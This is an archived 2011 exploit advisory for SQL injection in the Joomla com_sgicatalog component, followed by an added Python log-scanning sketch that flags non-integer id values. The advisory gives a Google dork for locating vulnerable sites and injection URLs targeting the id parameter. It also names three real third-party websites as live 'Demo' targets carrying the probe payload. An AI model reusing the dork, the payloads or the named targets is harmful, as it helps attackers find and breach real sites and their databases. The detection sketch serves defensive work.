Securityvulns SECURITYVULNS:DOC:27211
Oct 24, 2011 - 12:00 a.m.

Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability


Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability

Google Dork: inurl:index.php?option=com_sgicatalog

Date: 2011-10-12

Author: BHG Security Center

Home: Http://black-hg.org

Software Link: http://joomlaapps.com/

Version: 1.x

Tested on: [Windows XP- Persian]

CVE : Webapps

[*] ExpLo!T :

http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'

http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]

http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]

[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'

[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'

[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'

[+] Peace From #BHG

Vuln Component : com_sgicatalog

Error in file : Joomla Component (com_sgicatalog) SQL Injection

Vulnerable parameter : id (&lang=en&id=)

=================================BHG Security Center=====================================|

Greets To : |

                                                                                         |

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |
============================================================================================ |
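
Detection sketch for the requests described above, added here as an example and not part of the original advisory: it scans web server access-log lines for requests to option=com_sgicatalog whose id value is not a plain integer. The log lines are constructed samples, and the rule that legitimate id values are non-negative integers is an assumption, since the component's source is not shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_sgicatalog'
    '&task=view&lang=en&id=416 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [24/Oct/2011:10:00:05 +0000] "GET /index.php?option=com_sgicatalog'
    '&task=view&lang=en&id=-416%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    # Same probe under a sub-path, with the parameters in a different order.
    '192.0.2.78 - - [24/Oct/2011:10:00:09 +0000] "GET /path/index.php?id=-416%27'
    '&lang=en&task=view&option=com_sgicatalog HTTP/1.1" 500 310 "-" "Mozilla/5.0"',
    # Another component: out of scope even though its id is not a plain integer.
    '192.0.2.10 - - [24/Oct/2011:10:00:12 +0000] "GET /index.php?option=com_content'
    '&view=article&id=7:news HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
]

# Client address and request target from the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate catalog item id is a non-negative integer.
PLAIN_ID_RE = re.compile(r"\d+")


def suspicious_requests(lines):
    """Return (client, decoded id) for com_sgicatalog requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target = match.groups()
        # parse_qs percent-decodes values, so %27 is compared as a literal quote.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        options = [value.lower() for value in query.get("option", [])]
        if "com_sgicatalog" not in options:
            continue
        # Check every id occurrence, in case the parameter is repeated.
        for value in query.get("id", []):
            if not PLAIN_ID_RE.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer id {value!r} to com_sgicatalog")
```

The same integer-only rule can be enforced at a reverse proxy or WAF in front of the site until the component is removed or patched.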